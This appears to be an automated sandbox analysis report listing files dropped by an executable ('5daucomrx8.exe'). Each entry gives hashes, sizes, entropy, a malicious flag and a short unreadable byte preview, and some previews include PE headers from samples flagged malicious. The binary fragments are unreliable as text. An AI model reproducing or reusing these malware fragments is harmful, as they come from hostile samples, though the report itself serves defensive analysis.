                            SSDEEP:384:hPti51O51Yd5XMSArl8OezLN1ENX6QGuYsUhLgdcgT2k9B:Rtw1E1Yd5dArqsfGuYJhLgBF9B
                            MD5:8CDD220B6EDD5261639FF15FB19FF044
                            SHA1:A76846914B9AF25DA85DFD57A09C0C18406B5EF5
                            SHA-256:95E71E48E27559C30A9DD0C333A69C22F8C13BF512A459BDC7A44D045F30C5DF
                            SHA-512:16799000C537303EB7F6F99FB2F649680C4792810AA18FA6E3C0C9B450B2457B7754D5C187D65F08AC19426CBA3F6D4F66E9D2ECF03804BBB890A6A9E41F929B
                            Malicious:false
                            Preview:YY_^..].....=.QL.............\$..D$.%....=....u..<$f..$f...f....d$.uZ.*.....=.QL..t2.....\$..D$.%....=....u..<$f..$f...f....d$.u............$.T$..D$..........T$......P..<$f.<$..t..D..........T$..............Y.....................L$.....S............u....=.IL....y.......K..........=.IL....\.......K.......N...Z.T$......D$..u.A.3..........D$..u.........3...3.%.....D$.u.T$.....D$...%..........=....u..T$.u...u...t..Q.....$.\$...q.........Y.a.....t..............B....D$.%.....D$.........D$.%.....D$.t=.f....l$.....D$.....t..-..I...t.................Q......J........A.........................-..I.....................u.....K............u.......U..QQ.E.P..t.I..M..E......*j.h.....!Nb.PQ.X......|...=.o@.v......M...t....Q...].U..j@.u..u.........].j.h..K..6..3.M.3..}........u..8.........';..3.....3..]........t.3.f9......t..3......u...u..e8..........3..E.f9.u .N8........j..E.PhP.K..........V.u.SW...........}..E.............*6...u..}.V.U...Y.U..V.u.W.....u...7.........m:.....
                            Process:C:\Users\user\Desktop\5daucomrx8.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):27648
                            Entropy (8bit):7.99382891468895
                            Encrypted:true
                            SSDEEP:768:g3mH77WgmVWcQ8KysW5AS3jVjGSSRC+LT+:8KKPWcQM5AqjVj+ZT+
                            MD5:EE95191B367041AB62585FE75D565559
                            SHA1:6BC56BE81FB1B29A0E38D9DF2D3854F36704739C
                            SHA-256:2D57FB7B3B3BF691627260F165754B5C7BC296B233197BC092BEBEDD10199198
                            SHA-512:567580B9780C00CCCE14DBC13D14169EF8AB8BA5EF98AE9E9577D37568AC4E81BD25A3D9C43DED217B323B6842000D8550ECF1008B64B16F30DF95DFCC1081A4
                            Malicious:true
                            Preview:.W.<.9....%.*......q&Cz..h.S...[>A...}w.W..,...L.Y..d.../m......0.I.l..~....Y,...Q...>.k..+.......vFo)YM@Ou..+C..zXdrP.....].x.9.D....b..iZY....W6RIj.2p1.\....[,.E(./.(...0.:....F..A.N.......s?......6...A....O.d..5u..Q1<.e...w.VSi..."FKv3.V.{t<....b.${.~.P...M......./B.^M..h...LY.Q.5.....0.......T.*s.;..J../...>i.z#~.IL..@g."..~.0-6....#..#.{.h../.....Wr7q...c..=\.P....s..J,j...<,..eQ.Z...Q.O.:4*2.)'<......0...j.u....ULL...8..).h........8-...v\.......!:.M..+...*.iX.7.......d...:d..h..."w.......s....?....&...9.A.......'PE..v..V.1X..onK_uH.c...&=.I.O..=9.mlUR4...S.b..i........Y.G..H...K....H../gs..>..&p.E.%.C.X.....a_v`2>.>..N.........!.......=....[V#.=..j.2...k#.o..O..]..x.......p..y.9.....ml......V.....4c?......B...dX4._.+Y...]....Y...s.^.9.ID..wrK+g..k.-.A...>..qq.U.:.G...4.F...\bO.m.7.......M.C.\.[YV.`.~..\B.v./.@....f..Ibdj.<.(J.l|mP.m..$...rfJ9<.C.X.g..5..V@E%.{S....^..d_~p.3kX..cE<^>.].E.K.......c..g1.<.0.....Lq.>U...m..V.....
                            Process:C:\Users\user\Desktop\5daucomrx8.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):136192
                            Entropy (8bit):7.998465540176465
                            Encrypted:true
                            SSDEEP:3072:KoqcNY/5QXNTEODIZikpT17L4dPvsBMnkptG6aSR9y+3/:KonNY/5Qd+ZRp94lvJnQ9y+P
                            MD5:B1200B786C5397EBB9DCBC176B229B0D
                            SHA1:D9BFFC8766CBE6FAA64E7951DC4EB4052610225A
                            SHA-256:ACA2E1C133B9DFA829CE1705FDE04035D3775FD07F31D35EA5169D3D20C70721
                            SHA-512:AAB48DCEA508BC7433EDB7F00887F75664FA31B0C57332ECBB1007EE5D940150A4E20C6B96B655871F72180CD03D5470A2B2232042788F5AC0645C6DC62F9338
                            Malicious:true
                            Preview:.p......C7...._9....8..5M...h..T..F..(..cd.:.#K85)]$."...r....4.j...<9...~..)qi.>...e..............O...D.H..?.....DS.&..l.H.....J.N.."...&l&.H.X.D.\....NJ...LS..^.M.1...%".~.|.Z.)T.t~...C.t.....H.....P...Rt..%.#..h....`B...................s..z.+...'..*.D.....m.............[..::...._....&..t....6..HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..!..)98O...,.XOg;Mm.=..A..FPWW.....Y...$c..F.Kx...i..f3.H....2)...<.9.m....&...4....R....C.<.'.F...h.............T......{T......{kC.R......%x....}...q..U-...(....%....V..?p.hf..........@.#....{'.l..v..*)~.K....dC`:.......c!.).A.&!0..~..}..h..w14.h.%.!4.A...V..+}.,{{.s.x..K....V.E...`.[..r..}.!..,P..Myn.2..t.W.....L..f.P...T......{T......{m.....:c..8.5...x..2).U.j....2>.$#.~....E.....$h...}......H..l.{F...3G......`*w.r.3.*mq...K.R.......m%_^W...H.... .(.....6.F.|m#n...N:Ta.....<..)....... .^e.z...X b.^.....3g..+...4A...?.O.Q
                            Process:C:\Users\user\Desktop\5daucomrx8.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):56320
                            Entropy (8bit):6.08004899796524
                            Encrypted:false
                            SSDEEP:1536:ax10IKQ8SoXTqgWVrZ+Int3SdFc9vtmgMbFuy+:211XwT5MAg0Fuy+
                            MD5:228F8CE4E1CA3BAA49EB7560F7A5ADCE
                            SHA1:F258D0EC853E88B6D1E1DD8C71A0D05E79108B6B
                            SHA-256:76F5FC75B2933F461B0C51738DE828ED895114EE84F5B5C68857666D5CA38292
                            SHA-512:0955A2D9FC5CBBCB180E1148F468D1674F72B0FA31A24D40E393F47C2DB11099799B104C3135FAC2A4191E5BEF844BA0543C57BE41FFE6AD0199E391D9417BA4
                            Malicious:false
                            Preview:....I....x..u..p.....I..E..8hL.P.....3.@..3.^..]...U..E....wf.$...H.h.....]h.....Vh.....Oh.....Hh.....Ah.....:h.....3h.....,h.....%h......h......h......h......j...h....j...,.I.P..P.I.]....I...H...H.h.H...H...H.%.H.h.H.,.H.h.H.3.H.:.H.A.H.H.H.O.H.V.H.].H.d.H.U......4.=.bL..SVWt..u..u............u..F...^.....L$.........D$..(.I..L$$..t.j...PS.. .I..}....}...L.u.j...P...wLS.. .I...H..D$ u.j...0.I.j..D$...(.I....wH..H.I..D$..GHPS..@.I..t$..D$0S....I..|$...|$0.D$(.F....D$.....t6j.j..D$8P..,.I.j...(.I.P..H.I....D$0VPS..8.I.V....I..&.|$..t.j.j..D$8P..,.I.j.j..D$8PS..<.I..t$..|$0.D$0.....t$...t.j.j.P..,.I.. .|$..t.j.j...j.j.P..,.I..L$0.L$4.t$..D$4PS..@.I.j.X..u.9t$$t..D$0.D$4.u......j..|$..6..\.I... ..u... .|$......u.....|$.j.j.j..6....I.3.j.Z.p............Q.Rc..YVP.D$$.E..0..l.I.W.D$4Pj..t$(S..4.I..|$$.t:.t$..|$0j......D$4.D$8..(.I.PS.. .I..t$..D$4Pj..t$(S..4.I..|$..tE.t$..|$0j.......H.I....D$0VPS..8.I.V....I.j.j..D$8P..,.I..D$0PS..0.I..t$...c..Y.t$(S....I..t$.....I..t$ S.. .I..t$,S..@.I.3
                            Process:C:\Users\user\Desktop\5daucomrx8.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):15360
                            Entropy (8bit):7.964090703920312
                            Encrypted:false
                            SSDEEP:192:PcoYHWsVLQG7U4/UnUhJgrQ9LVSfqqz1bzynlqjlcUEKGGlxiOGKodXxoziwyj:kp8G7UGUUhJtk1UlaOhKGGLiO2myj
                            MD5:BB2CCCF73F02DB4F7A646E95DD858E93
                            SHA1:66928DAF33419D80C7F29458233081405D095BDF
                            SHA-256:0C4926AF83E5AB5B09A1FC44D40FF31C5DC3D25F0B94787304EEBAF878E5A923
                            SHA-512:C5885043045699CDAADBE271D8C96EAD31609D03102EA6FF312BFFF74980B5DF93ADE67BDE37BE648FE2FCBC50CC2788FC88616882B8AE6D763E1C41E486AF31
                            Malicious:false
                            Preview:..02....Q~G.O..._!....6..)..........(R...5k>.....P#.j...A),.._.*?V....7....T...-..jYQc*...LAw.Z.1......E......@..9.Hz.|......KTQ.J...........%...s..J..5`.....R;.A..zg.......e2Q..4...R.....&.a.0M..&....8...@)..@.....y....@..v..e..n..........n: .T*..........*......;...~...../.t:M.......7..w.}..r..!....|..P..V...Q..~]./X..{....q..!...x..`.f .bX.a....jP.6!.L:...%..#.3..@...X..#.u..C.h.+..E.e2...D.MJ .].(..^{@..?^..$..0..1..............|.i..{JA&.yr..@....{..'NR....i ......A.X..&O...L.6....4...j...w#.;.....86o.%K...C.u+FFFZ2....r 6c.zBZ.T......">...#..{..~.._...........w.n....O|b.e..v.i.#Oi.4....R+...m..b........h."....&..d.<.b)X..L+...-(5x7...a.tRED..cD.?/...F.f+...:.4.!.I..<].~.R.*....=<.:..x.....K.p.A....M.U......9HU.@.....E./ D.|W..V.L.............,J..1eVIN ."..D0.*3.E.. ..o.5`.LX...@..L..P.3.`<.D.|.S.a.R.u;./^...Al...1.s...h~?...N..L&q.W.{.7~.S.j.2I.5.@K.hA.u..s.ZO<..l..u..!.N.P(...v.............x..4.O".=...E.0.aP+.*........
                            Process:C:\Users\user\Desktop\5daucomrx8.exe
                            File Type:hp200 (68010) BSD
                            Category:dropped
                            Size (bytes):188416
                            Entropy (8bit):7.999219839853688
                            Encrypted:true
                            SSDEEP:3072:g028DNSTkTBZVGRugMV1rcwg7wox7jLC77bM5pI5Xzctz2u4p82qSiyoWwa:bRDNmk8Ru/tcZFLC454Xo2FpnuWb
                            MD5:275F1D93F40D7E0818D72D7049F32391
                            SHA1:2A64B4E637587453B3871A566BFBAE228DCE3655
                            SHA-256:D6754CE1CE925A6401BDA0901DDF7C13557771572C9388B41ED550AE9DD71970
                            SHA-512:3EF0F7568F5D17E072C3E53D1EC3DD18F9E833BF861B9B34884A94CD51F50A4C72BCE7B7742EF0415A351BDE0DEF87CBDB5E2C0B036AF48B77F7E0318F18FF7B
                            Malicious:true
                            Preview:..EN.0g.P,..^.#7..m..+..x~....g"5...4...V.....9.e.t$.$.T......m..J.....7..aKw...`.tW*0.U.~....a.......a.m...rs.x...{...~..GX..9..E/\d..Jw*(hW....>%Q.p..Q-=.1|....%F... .i/BeK.l[#.....G......u%.k..x.C.q+ZP.....@x.f.J. &...zU.....I%.M...3..#...i.....;.,...4...%..:8....[*.-V]}_.BO..,Z..7..<c#x@.Y.....&h.....E...&.....uq.o....D.Zr..I?5..l..r.RV.....`....m..md.@d.....(v.h.DiN.FR.K.>.Yq......Q.[.I.....{....s@..D....W.....XJ.U......Lj2'#....;.(.(i.bQ[......u..~f..U).*.....E5.k..lh;...z....../<").BH.....@..-...f....M..b...\\..>.A_...>......R.=..j..Q!..U.e......P...'.H..OQfi...........X.m*...|P..C..Vx..F..+.._.h.Ix...dXy...l~.U.A....X2..v....P.W.^=u=.z.....d.J.l+..i.^......._/...5...0.......0|...N1j/..nV.fN.Q(..r0.2..q...o.....n-.\r.%...3{.....Y....y.W..X....na....*$...q/b...*C..Tv.0..`.MI.M...}.......{...}........@.....~Z..&.._.;...t....y.../....zo..#RnI...L..>.gK..QiN...-xm...M(..Z.@e.rb..U6.^B..._.L.c..-(.../..3.,...#.y%W.w..?.`...
                            Process:C:\Users\user\Desktop\5daucomrx8.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):228
                            Entropy (8bit):4.912778886893481
                            Encrypted:false
                            SSDEEP:3:ZWdYZKeB5GMK3WUqt/vllpfrYZcFTS9gXeF+X32ZpAo3P8GmbgElKmE/p3PeUwyd:PZKNtqjvVg3F+X32l/8xb99E/p/LrJv
                            MD5:31050816B2F450A717786D075367899E
                            SHA1:A7ADE2BF93708934B9E276FCE3AA2323A25E007D
                            SHA-256:4A6FCC7E68D22A69DB4735D3900F3EA63F767D67218610AFD43EA8F1AF9B4FB5
                            SHA-512:D588927F8FDCC0E7468A5A2839537CB3A4F2FF7D942C63EB8B20E53CCDF9DBA63A394BC75E67F0395B5525382CB33EB81BCB55995B29B9D7E357361900C332B6
                            Malicious:false
                            Preview:MaskBathroomsCompoundInjection..MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..
                            Process:C:\Users\user\Desktop\5daucomrx8.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):8192
                            Entropy (8bit):7.92684458026462
                            Encrypted:false
                            SSDEEP:192:FZPay3BVTVNcawaUaAl5+EDaPc+sJPgJSZsQ8+mmPBjDgYlRLe0m:PyyxVxCawaUai0EDaPcpVOSZsQ8yhFnM
                            MD5:A88120E86BA6642F82BA2854752F752B
                            SHA1:3344518B5CD114855C28807EDA8DF0BD7BCB3293
                            SHA-256:403446E9ADF7A1B92B7B067933DA55A2E16A866BB317C5CF1884A7F2B3D3FEF1
                            SHA-512:7CFBDF196A6633214AD352135EAEBC9146B92A75D73EBA9C7D5C8DDB88EF468BDEB898B2FB47C34BE3FA771C0DA7CDB4CFBCD97CEF5B16BE1975319C09B54EDE
                            Malicious:false
                            Preview:..5..O$T..Th..1..#..#....#x.099.?..o|.S.._..../.;..i:..B{R.%.X..r.m..-....C$.i..[<.I9f&.LB.z/C..1.U....P.3Q....)Mq._.;/.0f...1.Z....@...@..x..D...o..ox.........?..a..A....5..N.`....[b6.....~.g....W....KQ.T...P,.O...j.~...)..RI.,..E..y.r9d2.d.Y..y..E..O........w...G".D.Q$.I$..$.I.%..0..(B....@C...N...r.Y..}j...@@.e..D.L&..F.e..<..C.....u.].....V&._.....~g..F.[.........;.|w.PX..~t......T&.l....I.o'..d..'..P( ..".Nc||.###......(..Q^.T*.4..c..`P.K....:...Z..j..P........5...E..?..........R).b1.\W...I...k......@tb.....|.L..>. .............V&.......~'.0..o...X..z.Ms...........f......Zqt........%......0..Aww7........p..=r.(j..J...fM.@...a.......&....`P..4....?.....K...r..B........m.H&..?.>......tww#.J...,..8.....A.L...d&a<.G2..a........7>z.=...\.h..|]..k..-../..i\_..v.M..z..?....R.`rrrF._<...t...V..P(.a.p..a.8p..........Eww7..(......&s9...=A.]n...A.>P....4@...AA..SJA...p.p..c.`....8p..m8N.v...v`.5....z..z.v..0.....!..1.5..15.......<"...-Z....b.9...A2.T..v...
                            Process:C:\Users\user\Desktop\5daucomrx8.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):22528
                            Entropy (8bit):6.598039640950927
                            Encrypted:false
                            SSDEEP:384:kZM0/1zbE1PJcF8ufnpZ9aBXYrxzDZJgs/ZN/EyFpdflwxFwfydtR:IR7F8ufnz4kVDZxj/JiFwfGb
                            MD5:A8E1EEDC8535B6279C38AFCACF58FD7E
                            SHA1:05FB410C23AD68942B2F4FB8E667E8DA076FAB5D
                            SHA-256:DDF7E69C7CEC0A248D18BE08965A74F2F05755541258AEFA3DCA0CEA68186794
                            SHA-512:5C3BBF661A14C9B40D5A292CC8CD09F1AE860272BA33C26241043BE0C52E27D7F86A5DAD097FDC7DD15FC1A71C394B392293F7BB53F8724223F0182C45F12D66
                            Malicious:false
                            Preview:P.q..............YYj.X.......E..~......K.t.....t..8.u.P....3...YY.E.....t..G...t..8.u.P...Y.E.......H.E.u.V.{...Y_^[].U..U.........SV...W.......Jx..t...............t........J|..t...............t.......j..J.[.y...K.t..9..t........y..t..y...t..........Ku...............1N_^[..].j.h.K..t....e.............K..Npt".~l.t.......pl..u.j .....Y.......j..@...Y.e...54.K..FlP.!...YY...u..E...........u.j..w...Y.U..W.}...t;.E...t4V.0;.t(W.8.....Y..t.V.....>.Yu...8.K.t.V.F...Y..^..3._].=TbL..u.j..M...Y..TbL.....3..U..E.-....t&...t....t.Ht.3.].0?I.].,?I.].(?I.].$?I.].U.....M.j......%$BL...E....u...$BL.........I..,...u...$BL.........I......u..E...$BL......@..}..t..M..ap...].U..S.].VWh....3..s.WV....{.3..{................{.......K.+...7..FIu..............9..AJu._^[].U... ....P.K.3.E.SV.u.......WP.v.....I.3.....................@;.r................ ....Q......;.s....... @;.v.......u.S.v.......PW......Pj.S.J...S.v.......WPW......PW......S.8^....@......S.v.WPW......Ph..........
                            Process:C:\Users\user\Desktop\5daucomrx8.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):48128
                            Entropy (8bit):6.480046224305634
                            Encrypted:false
                            SSDEEP:768:jDuaIYXBQsBoDCHT5xv8xV9J7J6Ax6zNGB0toYyncyH9JRpHbDYA22HbbjNbkBYG:jDuaiC7v8xV96AE11yHxpfYAz7FbkdHd
                            MD5:9EEDB42201838CBA7570A89AD64AD7F2
                            SHA1:EA79B5DFA8BDCC2AC78BB21AC2755C21106F7299
                            SHA-256:1D0B6945F207DBF0A5F014AB15A124061F4BACF2C7198A52BE22549B24DF7A7E
                            SHA-512:AF2EF67C4EA4425F5BC1947BF26042E5F62AE05A5478BAFDC2C641F909D8D686D86D646F9FD46053DE555F346A6EA83F94FF26D2D662CBC30093D1A44651DA8B
                            Malicious:false
                            Preview:..`..3.@j..F.P.&....H....7........L$...{..r7.q...j).Qd....u'...#c....N.t$.y..u....`..j..F.....j..C..L$..d$...p..$a...|$..t!.L$...b...L$..p..h`...D$......t$..C..P....x..u.....3..t$..D$.j..u.RP..x..j.P...H....}....L$...`.._^3.[..]...U..E..@....x..u....x..t.V.u....._...&..F.....^3.]...U........E.SVW.@...3.\$..0...0_...N..D$.P.T$..Q..Y..u'.u...._...F.........Sj..H........+...8\$........t$.Sj.....I..].............<.I....ujh..K..L$..J..Q.L$.......t..t$.j.j.....I....1..j.j..H....(.....j.j..H....W.......^...#..C......L$......0j.P...H..........j.j..H...........^...#..C.......t^j.V....I...u5P..<.I.P...H.........j.j..H...........w^...#..C.....V..X.I....u....Z^...F......._^3.[..]...U..Q.E.SVW.@...3.]..0...]...N..E.P.U...P...u.Y...u...^..3...@S.F.P...H....M.......]..8].t..E..F......E...y...H.K......F......._^3.[..]...U......<S.].V.u.W....F..D$..]...#.3.D$.A.K.3.;.v..F..H..._....D$...tY.N....._.....tJ.F..0....\...F..x..t5.E..@..0...\...N..D$.P.T$..!O...|$..Yu.j.......D$......
                            Process:C:\Users\user\Desktop\5daucomrx8.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):187392
                            Entropy (8bit):7.999025054333345
                            Encrypted:true
                            SSDEEP:3072:h92h2zNappqK8+FIDVYpHHq9nXDy+VOSnogS8zJVUXSWerWyJyorLRh6Q:h942spq+cYazy+tnogjzJgS3rWyJLvj
                            MD5:1D5D54B6E631BFE5326A58FD4F4E51A5
                            SHA1:7290D85223FE25CF1E97CD476C6DC912DC85A31D
                            SHA-256:1539BC762107D3365CC8B89200F744FE6128180DF90624697C5A01351C66EEDE
                            SHA-512:3B92863996C50F2734CB87799A0CAD333DBD42D847DE744C1A743BCA7300CCF71958558BD437B4C43599965D76E0DA38298339E7D4A4C1F9B80B64ACDE206F19
                            Malicious:true
                            Preview:..b.x.1.yD.;.u@.?...#....%..f.ru.3..c3#>..oY.J+..`6...;...L.Q.. ..>.n.x..r..?T*...D.j.~..vpN..nN...w%....9u...h."........|nz.....V.l..[.G@.D...$.=.<~..t...e.f.h.D.w.....81.....R.sJ{)..c.N.C..1h....`.f,.12.w..$=.z_..M..u...N..{...7.~Y.0.....".l(....K..|=..Q.G.b.:.......F..+.p......s.:.."P....`).P.g.c...P.7.....%.^$\.otlH..>....G/.N..||....l.G,......b...,s...].P....D.....^...dJhz..{.;!u.v..b.D......!.......w]..@......|.D....]".A#..@.U......9{...:x..7KgF..k...........y.=...[R.%DG.1~Y.".....j..f.d.........|]H..0.j.?e....EQ.......\.o[.[.R...._.R)d.7..N...G....k.'.(Sf.!.9.C.K}.b../....Nx.Q/..p2...{.&..n....5.-g......>s.-.A.!g.....c...(..<....A.L{..c.n...[.....v...R.<..."..iC4=F.0`E9.b......0..~..........u.._..dhS...O.....k.\...pGw..J.........t.(.(.*#.Z_..".R(>..|....y.+..L...A<....L..)A0....c.....T....n.........Q.vI.....DA.B.8vi.E.._..M.I.|......\V<5.5...J..n.....U2.9....=..o'..W$.v.M......}.F|.b...Jg.....4'..}.E;..H.[."^a...o.&R4G.D.
                            Process:C:\Users\user\Desktop\5daucomrx8.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):21504
                            Entropy (8bit):4.693802997481543
                            Encrypted:false
                            SSDEEP:384:ir9LE/MpfhwHLWAkqLyH3Per2Wfn2HuboETcKiKjxqb:QbAGWrT+UTcL4qb
                            MD5:7E90051279FD9FEFB47BD91AD73B84A2
                            SHA1:708B9CBFF00F11E44EA48F1DDEAC3903B767F135
                            SHA-256:345CFF1F961BC66E4A5B41224D87DA5D0473DAAE9BDF2C39152D31642D324E59
                            SHA-512:8AF18A8F270CD2A144539F289E5FE856838D1E2909B589210132A7CD7D99BE8A9CC3313FF62A832E12AFD8B633D572B5AB79C4D867B88E53E95762CA2BFA5412
                            Malicious:false
                            Preview:OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO
                            Process:C:\Users\user\Desktop\5daucomrx8.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):48128
                            Entropy (8bit):6.485680327229379
                            Encrypted:false
                            SSDEEP:768:J3jsJhQlEF2VVay1N5J3SoO6Qku2ox3hOk3Hsu1izubGntN6IZOjAV0SMgO:JgjQWq8GV3jOTJh1Xl2ub2tBOjAeKO
                            MD5:007AD2509FC5EB8C45ABB18FD9453D9A
                            SHA1:134A3E886D13919AA4F1640B64E8F4ABBC7517C4
                            SHA-256:C04D04B33A1D01623232179BF43B500248EC82037896D7D5F59BC12343F36C53
                            SHA-512:13E41B42AD71372BE7EBF6E8E038873D8373F3CF88EB9DE2CA2A060DA4660A947A36AAC52FA191166645DF915AC3724D5FD77F1BA9C637C811896A440922E0EA
                            Malicious:false
                            Preview:w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...y..U..........".................*.............@.................................w.....@...@.......@.....................L...|....................8..0....0...q...;..............................@X..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...............................@..@.reloc...q...0...r..................@..B.........................................................................................................................................................................................................................................................................................................DQL......h..C.....Y...L..h.C..{...Y..N..h.C..j...Y.h.C..^...Y..<C..h.C..M...Y.....h.C..<...Y.Q.>...h.C..*...Y..cL.Q.@...cL.P.9...h.C......Y..G..h..C......Y...(
                            Process:C:\Users\user\Desktop\5daucomrx8.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):22528
                            Entropy (8bit):6.260801045174954
                            Encrypted:false
                            SSDEEP:384:IjnsRfctrJsnb2Kev0hLk1G+CAiwo8Z8T5RZWfkBTjeVmr5D5naEM66z/rIYlUwF:IjnsRf4rJsb25v0hL4G+CAiwo8Z8T5RC
                            MD5:0913A5290E2124D926F0BB85963A39A1
                            SHA1:7A21A7E07C48BC1540B477C93C295576BD1D06E5
                            SHA-256:CAF36EB19FE881753A0487540673B4B2DF3E528893CC5B3CE5843856B4A8BD8D
                            SHA-512:95407ECAFB3E5462CC14F4AB5CC4F9A233116A7B3A9BB31AB06BF882D3B22666EDBFD47333AA747A71FD96DF771BD7F9BE5A6AF069AF508BF2079DF7F3CED79B
                            Malicious:false
                            Preview:M.u.}.....cJ.....cJ....u.u..}.u[.U..E......O..s.3...i.u....3..m.E...{.....}....M.u.u..E.........]....E......M..E......}..E........|r.E.;F|...B.........U.E...t...%....=....u .E.............%............E..R.U..kf..........|...E.@.E.;.~..U..E..M.;}....u.......D...E..E.;}.|........E..E.....;F|sf.U.....}...t/..%....=....u!..G.......%..........E...........R.U...e.......tB.E..M.}.G.}...H.E.;}.|..%.......t.;.....v..Fh..................}..M....sw...E...@..P.u.V.u..u..}t..........u......;E....{...}..t.f.......f#......f;.u.....E...@..P.u.V.u..u...t.......t..u...F|.M.+..........B..f......M.f9C....z.......v....C.......%......................w......M.E...%....=....u#.E.............%............E...M..S.U..].;....s...............00K......%....y.H..@.....M0eJ....$?J...9E....y....v....K......f;.w..F<.....E.............f;.w..F<.....E.;....y.........E...u....C.....U...E.M......E.....3..E...C..E..(t...5t.3.........U.....c......E.......3..E......U.....E......M..=...............+....
                            Process:C:\Users\user\Desktop\5daucomrx8.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):108544
                            Entropy (8bit):7.99824795156944
                            Encrypted:true
                            SSDEEP:3072:gN/TuiNFWyzCqyo6dskgKiHp229uwVpTY+x:aLulsqs3b2y
                            MD5:496BC58AB55492C6FF50B4B5FB12226D
                            SHA1:C122773FD32BA5000B4637D21C92AEACA4DD982B
                            SHA-256:3795AE53D60FD640A16642A2585F12783D84E963DE9C1A605286977511381A5A
                            SHA-512:6B805EB934B84B43833B94075D350C9214333FA11A7E16A5196AC19BB9E85A445DCBB4E8FC5FA7A3500C53048F3CBB1BC80AA43295FB678952FDFC439C3F290D
                            Malicious:true
                            Preview:v..<6!yr..k.t.,^\&h..'..@.....6{p.n..%....*9T.5..-........~.R.,9..$...V.pw....^J/(60..N#...aKiT.|.g..M..+.}1..z.......i....C..y...M.y..U.kS..("_..gO.8."...d.....>M..~..,2.......,...P.......2...T..,b.P.._.~=f._`....S...p.z....?KN.`v.A...7...W/..D.....l}R.`..C@....b..)N.,3....eET..I..).Uj..?....P..>;U.V.....ir.-.]K..^..Y....(#.s.*..V...(.....~..8.?.e.X~...p..+.......z=.lM......)...+.;y...Z.1.2y..0.xi...|~2g$"B...0<QN..69.^.....3.._q.y.3..eN...0y.....#Z...Y#C...&...K.1.\..J.^.I.40c.......$x..:ka..%........j.27Xf:.r./.........hdl/....z=...)"....1..p3.!.....z.........ez....6.Y>...d...n+...r.u..Gx.{..!p2.pX.[.z.....rcA."2C....B.."..!..Z.y.........e4..7)z.Y...u.kG..t..#f....2..........E.]S.....@....E....9M....T.q..=...v4.<.....R...b..\.M[...........T..X.Jvk.....D......?.|.BT7.......\V...(...Z.~;.....$......~.|.A....?&Y/GM).3...R.a....Z.W..9j4X+f.).g{..D.Et*r!.yGT...-.x^.....a...S.C....K6?.D.}8.>i..$.....H.l.a...).rl.j.A.@..H.d.:..3.M.M9..=
                            Process:C:\Users\user\Desktop\5daucomrx8.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):144384
                            Entropy (8bit):7.998488536802585
                            Encrypted:true
                            SSDEEP:3072:Dgr6MsiRjR0gvthbbwTy3PTdwYH8RulVxhDCWlXr:DgrBjSerb0OrdwPS4Wp
                            MD5:F2672513A6295F6009C6A701631E5248
                            SHA1:9D1FFAB9FFD4C4B112DA0AB9A9FF9B9AF195F6BF
                            SHA-256:289DEC0B62B622A5478869DFA7743313B5F954C529A5279D73786E3BC9EFEFD8
                            SHA-512:5086E6CD3E52C1F478083B405616316529280AD683EEBBFE4DCC461F6C990A6E33A2F409F036224906A628BD24B05FE25FD52A574D86C1BC116780494C3EAF60
                            Malicious:true
